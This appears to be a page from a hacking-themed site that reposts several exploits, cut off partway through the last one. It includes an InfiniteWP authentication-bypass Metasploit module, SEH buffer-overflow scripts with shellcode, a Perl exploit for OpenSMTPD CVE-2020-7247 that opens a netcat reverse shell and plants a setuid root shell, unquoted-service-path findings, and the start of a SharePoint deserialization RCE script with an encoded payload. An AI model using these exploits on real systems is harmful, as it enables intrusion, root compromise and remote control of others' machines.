    Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe Version: 12.4.18 Tested On: Windows 10 (32-bit) C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Sync Breeze Enterprise C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe Auto C:\Users\elaglor>sc qc "Sync Breeze Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Sync Breeze Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Sync Breeze Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  14. HireHackking

    WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress InfiniteWP Client Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass in the WordPress InfiniteWP Client plugin to log in as an administrator and execute arbitrary PHP code by overwriting the file specified by PLUGIN_FILE. The module will attempt to retrieve the original PLUGIN_FILE contents and restore them after payload execution. If VerifyContents is set, which is the default setting, the module will check to see if the restored contents match the original. Note that a valid administrator username is required for this module. WordPress >= 4.9 is currently not supported due to a breaking WordPress API change. Tested against 4.8.3. }, 'Author' => [ 'WebARX', # Discovery 'wvu' # Module ], 'References' => [ ['WPVDB', '10011'], ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'], ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'], ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html'] ], 'DisclosureDate' => '2020-01-14', 'License' => MSF_LICENSE, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Privileged' => false, 'Targets' => [['InfiniteWP Client < 1.9.4.5', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'} )) register_options([ OptString.new('USERNAME', [true, 'WordPress username', 'admin']), OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php']) ]) register_advanced_options([ OptBool.new('VerifyContents', [false, 'Verify file contents', true]) ]) end def username datastore['USERNAME'] end def plugin_file datastore['PLUGIN_FILE'] end def plugin_uri normalize_uri(wordpress_url_plugins, plugin_file) end def check unless wordpress_and_online? return CheckCode::Unknown('Is the site online and running WordPress?') end unless (version = wordpress_version) return CheckCode::Unknown('Could not detect WordPress version') end if Gem::Version.new(version) >= Gem::Version.new('4.9') return CheckCode::Safe("WordPress #{version} is an unsupported target") end vprint_good("WordPress #{version} is a supported target") check_version_from_custom_file( normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'), /^= ([\d.]+)/, '1.9.4.5' ) end # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php def auth_bypass json = { 'iwp_action' => %w[add_site readd_site].sample, 'params' => {'username' => username} }.to_json res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_backend, 'data' => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}" ) unless res && res.code == 200 && !(cookie = res.get_cookies).empty? fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}") end print_good("Successfully obtained cookie for #{username}") vprint_status("Cookie: #{cookie}") cookie end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super print_status("Bypassing auth for #{username} at #{full_uri}") unless (@cookie = auth_bypass).include?('wordpress_logged_in') fail_with(Failure::NoAccess, "Could not log in as #{username}") end print_good("Successfully logged in as #{username}") write_and_exec_payload end def write_and_exec_payload print_status("Retrieving original contents of #{plugin_uri}") contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file) unless contents fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}") end print_good("Successfully retrieved original contents of #{plugin_uri}") vprint_status('Contents:') print(contents) print_status("Overwriting #{plugin_uri} with payload") unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie) fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}") end print_good("Successfully overwrote #{plugin_uri} with payload") print_status("Requesting payload at #{plugin_uri}") send_request_cgi({ 'method' => 'GET', 'uri' => plugin_uri }, 0) restore_contents(contents) end def restore_contents(og_contents) print_status("Restoring original contents of #{plugin_uri}") unless wordpress_edit_plugin(plugin_file, og_contents, @cookie) fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}") end return unless datastore['VerifyContents'] contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file) unless contents == og_contents fail_with(Failure::UnexpectedReply, "Current contents of #{plugin_uri} DO NOT match original!") end print_good("Current contents of #{plugin_uri} match original!") end end
  15. HireHackking

    Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.disksorter.com Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe Version: 12.4.16 Tested On: Windows 10 (32-bit) C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """ Disk Sorter Enterprise C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe Auto C:\Users\terran>sc qc "Disk Sorter Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Disk Sorter Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Disk Sorter Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  16. HireHackking

    DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.picture-on-tv.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "name.txt". #2. Just copy the text inside "name.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 256 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x1004bb51) #0x1004bb51 : pop edi # pop esi # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll) long_buffer = "\x44" * 600 shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode + long_buffer try: f=open("name.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  17. HireHackking

    Disk Savvy Enterprise 12.3.18 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Disk Savvy Enterprise 12.3.18 - Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: http://www.disksavvy.com Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v12.3.18.exe Version: 12.3.18 Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "Disk Savvy" | findstr /i /v """ Disk Savvy Enterprise C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe Auto C:\Users\nightelf>sc qc "Disk Savvy Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Disk Savvy Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Disk Savvy Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  18. HireHackking

    Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.wedding-slideshow-studio.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "name.txt". #2. Just copy the text inside "name.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 256 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x100411fc) #0x100411fc : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll) long_buffer = "\x44" * 600 shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode + long_buffer try: f=open("name.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  19. HireHackking

    OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation # Date: 2020-02-02 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.opensmtpd.org/ # Version: OpenSMTPD 6.4.0 - 6.6.1 # Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 # CVE: CVE-2020-7247 #!/usr/bin/perl # # raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD # Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info> # # smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and # other products, allows remote attackers to execute arbitrary commands as root # via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL # FROM field. This affects the "uncommented" default configuration. The issue # exists because of an incorrect return value upon failure of input validation # (CVE-2020-7247). # # "Wow. I feel all butterflies in my tummy that bugs like this still exist. # That's awesome :)" -- skyper # # This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to # root on OpenBSD in the default configuration, or execute remote commands as # root (only in OpenSMTPD "uncommented" default configuration). # # See also: # https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt # https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/ # https://www.kb.cert.org/vuls/id/390745/ # https://www.opensmtpd.org/security.html # # Usage (LPE): # phish$ uname -a # OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64 # phish$ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel) # phish$ ./raptor_opensmtpd.pl LPE # [...] # Payload sent, please wait 5 seconds... # -rwsrwxrwx 1 root wheel 12432 Feb 1 21:20 /usr/local/bin/pwned # phish# id # uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) # # Usage (RCE): # raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org # [...] # Payload sent, please wait 5 seconds... # /bin/sh: No controlling tty (open /dev/tty: Device not configured) # /bin/sh: Can't find tty file descriptor # /bin/sh: warning: won't have full job control # phish# id # uid=0(root) gid=0(wheel) groups=0(wheel) # # Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1): # OpenBSD 6.6 [tested] # OpenBSD 6.5 [untested] # OpenBSD 6.4 [untested] # Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested] # Other Linux distributions [untested] # FreeBSD [untested] # NetBSD [untested] # use IO::Socket::INET; print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n"; print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n"; $usage = "Usage:\n". "$0 LPE\n". "$0 RCE <remote_host> <local_host> [<domain>]\n"; $lport = 4444; ($type, $rhost, $lhost, $domain) = @ARGV; die $usage if (($type ne "LPE") && ($type ne "RCE")); # Prepare the payload if ($type eq "LPE") { # LPE $payload = "cp /bin/sh /usr/local/bin/pwned\n". "echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n". "gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned"; $rhost = "127.0.0.1"; } else { # RCE die $usage if ((not defined $rhost) || (not defined $lhost)); $payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|". "nc $lhost $lport >/tmp/f"; } # Open SMTP connection $| = 1; $s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n"; # Read SMTP banner $r = <$s>; print "< $r"; die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/); # Send HELO $w = "HELO fnord"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send evil MAIL FROM $w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send RCPT TO if (not defined $domain) { $rcpt = "<root>"; } else { $rcpt = "<root\@$domain>"; } $w = "RCPT TO:$rcpt"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send payload in DATA $w = "DATA"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; $w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n."; #print "> $w\n"; # uncomment for debugging print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Close SMTP connection $s->close(); print "\nPayload sent, please wait 5 seconds...\n"; # Got root? if ($type eq "LPE") { # LPE sleep 5; print `ls -l /usr/local/bin/pwned`; exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n"; } else { # RCE exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat #exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat }
  20. HireHackking

    MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-11 #Vendor Homepage : http://www.ivideogo.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "Shell.txt". #2. Just copy the text inside "Shell.txt". #3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" . #4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x1004f3e3) #0x1004f3e3 : pop ebx # pop esi # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("Shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  21. HireHackking

    Microsoft SharePoint - Deserialization Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests import sys from xml.sax.saxutils import escape from lxml import html import codecs import readline from clint.arguments import Args import signal def serialize_command(cmd): total = "" for x in cmd: a = codecs.encode(x,"utf-16be") b = codecs.encode(a,"hex").decode('ascii') total += b[::-1] return total def deserialize_command(cmd): length = len(cmd) s = "" for i in range(0,length,4): character = cmd[i]+cmd[i+1]+cmd[i+2]+cmd[i+3] character = character[::-1] c_hex = codecs.decode(character,"hex") a = codecs.decode(c_hex,"utf-16be") s += a return s ####################################### signal.signal(signal.SIGINT, signal.default_int_handler) args = Args() myargs = dict(args.grouped) if '--help' in myargs or '-h' in myargs: help = """ desharialize options: -h --help - This menu -u --url - The Sharepoint Picker.aspx URL ( e.g. http://localhost/_layouts/15/Picker.aspx ) -c --command - The command to run on the target Sharepoint server. -f --file - The file containing the command to run (Useful for commands with multi-lines or characters that need escaping) """ print (help) exit(0) url = '' cmd = '' filename = '' if '--url' in myargs or '-u' in myargs: try: url = myargs['--url'][0] except: url = myargs['-u'][0] if '--command' in myargs or '-c' in myargs: if '--file' in myargs or '-f' in myargs: print("Can't use both command and file options at the same time!") exit(0) try: cmd = myargs['--command'][0] except: cmd = myargs['-c'][0] if '--file' in myargs or '-f' in myargs: try: filename = myargs['--file'][0] except: filename = myargs['-f'][0] file = open(filename,mode='r') cmd = file.read() file.close() sharepoint2019and2016 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; sharepoint2013 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; sharepoint2010 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; PY2 = sys.version_info[0] == 2 PY3 = sys.version_info[0] == 3 if PY3: string_types = str, raw_input = input else: string_types = basestring, if url == '': url = raw_input("Enter the SharePoint Server URL ending with Picker.aspx:") headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0', } firstcall = requests.get(url,headers=headers) spheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16') spheader = int(spheader.split('.')[0]) payload = "__bpzzzz35009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600720002008700d600c600e6003700a3008700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600720002008700d600c600e6003700a30035009700370047005600d600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600720002008700d600c600e6003700a3004400960016007600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3007200970072000200f4002600a6005600360047004500970007005600d3007200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70072000200d400560047008600f6004600e4001600d6005600d3007200350047001600270047007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f20036000200e200e200e200140024003400e200e200e20002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b3006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b3000200c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300" assemblyvalue = sharepoint2019and2016 if spheader == 15: assemblyvalue = sharepoint2013 elif spheader == 14: assemblyvalue = sharepoint2010 else: assemblyvalue = sharepoint2019and2016 FullURL = url + assemblyvalue secondcall = requests.get(FullURL,headers=headers) secondcalltext = secondcall.text tree = html.fromstring(secondcall.content) viewstate = '' eventvalidation = '' try: viewstate = tree.get_element_by_id('__VIEWSTATE') viewstate = viewstate.value except: pass try: eventvalidation = tree.get_element_by_id('__EVENTVALIDATION') eventvalidation = eventvalidation.value except: pass if cmd == '': cmd = 